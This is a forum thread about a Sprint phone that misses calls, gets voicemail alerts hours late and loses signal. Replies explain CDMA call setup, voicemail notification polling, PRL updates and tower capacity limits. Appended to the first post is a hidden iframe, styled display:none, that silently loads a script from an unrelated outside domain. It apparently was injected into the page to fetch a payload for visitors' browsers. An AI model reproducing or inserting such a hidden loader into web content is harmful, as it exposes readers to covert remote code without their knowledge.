Why is it that my phone does not ring half the time when people call me and yet I still have full signal strength? Also, people leave me messages in my voice mail and I don't receive them. And sometimes when I call someone, as soon as it connects to the person I am calling, there will be a message sent to my phone saying I have a voice mail. But yet the voice mail was recorded hours before. (All this time I have the full signal strength.) Also, Why is it sometimes I have a full signal strength and 2 secs later i have no signal? And finally one more. Sometimes I will not have a signal at all, but yet I can power down the phone and then turn it back on and It will have full signal strength? Anything will help.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
I'm sure people like Homer will have a more detailed explanation, but here's my ultra-simple one:
It's all related to the cellular technology Sprint uses and not your particular phone model.
For example, (this annoys me to no end) Sprint simulates an immediate ring when people call you. To them, your phone rings as soon as they dial, while in fact, your phone may take a lot longer to start ringing or not ring at all. I would prefer it if Sprint gave the caller a recording like "Please wait, connecting your call" or something like that so the caller knows you haven't been alerted of the call yet.
I hate it when I miss calls and the caller later tells me "I let it ring four or five times and you didn't answer (or I got voice mail)" when in fact my phone never rang. It's even worse when it only rings once (fifth ring the caller hears) and when you answer they already went to voice mail. Aaaargghh!
About the voice mail notification, it has to do with the polling of the Sprint network by your phone. If your phone doesn't get the initial voice mail notification (kind of an SMS one-way "push" message), it may take the network a while to send it again. In fact, the network doesn't even know if you received the notification or not. When you turn your phone off and then on, the network checks if you have messages and sends you another notification. Luckily you'll get that one.
Welcome to the wonderful world of CDMA cellular technology. Ah! The things we have to put up to be I300 owners!
i've been struck by the same problem. my phone will beep a few days after the voicemail was left. sometimes the phone doesn't ring and the voicemall notification beeps. this is very annoying and it has caused me to miss a few important calls. it is not the I300 because my friend has the same problem with his LG phone. it's just sprint. if the other companies would offer some good phones, i would switch tomorrow. until then i'll have to stick with this crap. what area are you in? i'm in the philadelphia area. maybe the area plays a part?
Alright. You know the first question. Where are you located? If you do not want to post this answer here, you can PM me and we will talk more. What you are experiancing could be, and sounds like local network issues. But it could be a phone issue. First thing I would recommend is taking the phone to your local Sprint store and asking them to check your PRL and software version. If your software or PRL are too out of date, you could experiance some of the very same problems you have described. If your PRL is up to date, then ask them to test you phone. They will put your phone in an isolation machine that should simulate all sorts of different RF conditions. If you do have a RF reception problem this test should be able to tell you.
But get back to me on your location and I will check around to see if there are any known issues for your area.
Thanks for the support Adiascar. I appreciate your faithfulness.
This problem can occur in areas that have many active calls going on at once. There is a finite number of calls that can be active at any one time in any given cell sector. If you call them on it, Sprint will try to whitewash the issue by saying something to the effect of "We don't guarantee that you will get every call". So in effect they are saying that during peak hours the person calling you may hear a ring and eventually get to voice mail but you won't hear your phone ring.
I was able to document a similar problem over the course of 4 days which eventually got me a nice credit. Since then they have added more towers in my area and the problem hasn't returned.
Great point and great information. According to the area that you are in, the number of towers in that area, the number of carriers, and the number of calls you might not be able to make to call or be called. This is known as a capacity issue. This is the number one problem Sprint PCS, just like all wireless carriers, faces. This is the number one problem that causes bad voice quality, slow data connection speed, dropped called, network busy messages, missed calls, and many other strange message indications. Actually, other than bad customer service, I can hardly think of many other problems that wireless carriers have (please do not post lists of problems that carriers can have. i did say "hardly". i do know there are many other problems possible).
3G is going to be a good test of which technology is going to survive the wireless wars. CDMA2000 claims to increase capacity for both voice and data. WCDMA does not make this claim and their competitors actually claim that data calls decrease capacity. It's going to be fun to watch.
